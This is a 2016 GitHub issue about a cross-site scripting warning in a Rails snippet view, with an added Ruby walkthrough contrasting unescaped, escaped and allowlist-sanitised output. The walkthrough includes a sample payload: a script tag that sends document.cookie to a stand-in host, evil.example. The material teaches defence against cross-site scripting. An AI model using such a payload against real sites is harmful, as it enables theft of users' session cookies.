Cross-Site Scripting Warning in app/views/snippets/show.html.erb #654

Open
ari opened this issue Aug 31, 2016 · 2 comments
ari commented Aug 31, 2016

Security issue from Hakiri: Unescaped model attribute in app/views/snippets/show.html.erb

@ari ari added this to the 5.0 milestone Aug 31, 2016
@ari ari assigned k41n Aug 31, 2016
k41n commented Aug 31, 2016

We can use http://apidock.com/rails/ActionView/Helpers/SanitizeHelper/sanitize to avoid this issue. But it can hide some parts of bodies for existing snippets, for example <client_name> or [some URL] on snippet view page. We can customize it, but need to define white list for tags. @ari
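To make the trade-off in the comment above concrete, the following is an added example written for this page; it is not code from this project and it does not use Rails' own `sanitize` helper. It contrasts the three behaviours in plain Ruby: unescaped output (the "unescaped model attribute" pattern the scanner flags, equivalent to `raw`/`html_safe` in Rails), Rails' default escaping, and an allowlist approach that escapes unknown tags instead of stripping them, so a body containing `<client_name>` stays readable while `<script>` is neutralised. The constants `BENIGN_BODY`, `MALICIOUS_BODY` and `ALLOWED_TAGS` and the functions `render_unescaped`, `render_escaped` and `sanitize_allowlist` are assumptions made for this illustration, and the sample bodies are constructed.

```ruby
require 'erb'

# Constructed sample snippet bodies (not taken from the project).
BENIGN_BODY    = "Please call <client_name> today, quote is at [http://example.com/q/1]"
MALICIOUS_BODY = "Thanks!<script>new Image().src='http://evil.example/?c='+document.cookie</script>"

# 1. Unescaped output: the pattern Hakiri/Brakeman report as "unescaped model
#    attribute" (in Rails this is <%= raw body %> or body.html_safe). Plain ERB
#    does not escape <%= %>, so it reproduces that behaviour exactly.
def render_unescaped(body)
  ERB.new('<div class="snippet"><%= body %></div>').result(binding)
end

# 2. Escaped output: what Rails does by default for <%= body %>. The <script>
#    tag becomes inert text, and <client_name> / [some URL] remain visible,
#    because escaping rewrites characters but never removes content.
def render_escaped(body)
  ERB.new('<div class="snippet"><%= ERB::Util.html_escape(body) %></div>').result(binding)
end

# 3. Allowlist sanitising that escapes, rather than strips, unknown tags.
#    Rails' sanitize(body, tags: ALLOWED_TAGS) would *remove* <client_name>
#    because it is not an allowed tag; this illustrative version keeps it on
#    screen as literal text. Only attribute-less tags are allowed, so a tag
#    like <a href="javascript:..."> is never passed through. Regex-based and
#    deliberately simple (e.g. <br/> is escaped, not kept); use
#    rails-html-sanitizer in production.
ALLOWED_TAGS = %w[b i em strong p br code pre].freeze

def sanitize_allowlist(body)
  body.gsub(/<[^>]*>|<|[^<]+/) do |token|
    if token.start_with?('<')
      m = token.match(%r{\A<(/?)([a-zA-Z][\w-]*)\s*>\z})
      if m && ALLOWED_TAGS.include?(m[2].downcase)
        "<#{m[1]}#{m[2].downcase}>"
      else
        ERB::Util.html_escape(token)   # unknown tag, tag with attributes, or lone '<'
      end
    else
      ERB::Util.html_escape(token)     # text between tags: escape & < > " '
    end
  end
end

if __FILE__ == $PROGRAM_NAME
  puts render_unescaped(MALICIOUS_BODY)   # <script> reaches the browser
  puts render_escaped(MALICIOUS_BODY)     # &lt;script&gt; is inert
  puts render_escaped(BENIGN_BODY)        # <client_name> and [URL] still readable
  puts sanitize_allowlist("Call <client_name>, <b>urgent</b> <script>x</script> 1 < 2")
end
```

The second function is the check worth keeping in mind when reviewing the view: with Rails' default `<%= @snippet.body %>` no sanitising is needed at all, and neither `<client_name>` nor a bracketed URL is lost, because escaping only rewrites `&`, `<`, `>`, `"` and `'`. Sanitising only becomes necessary once the view is expected to render some HTML from the body, and then an allowlist is the right shape for it.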

ari commented Aug 31, 2016

Isn't this the same problem we have in task comments? Why aren't we getting an error there?

At any rate, I'd like to move to markdown for comment text (with some extensions of our own like #1234 task links). I guess we'll need to think about incoming text from emails too, but hopefully markdown will cope with that.
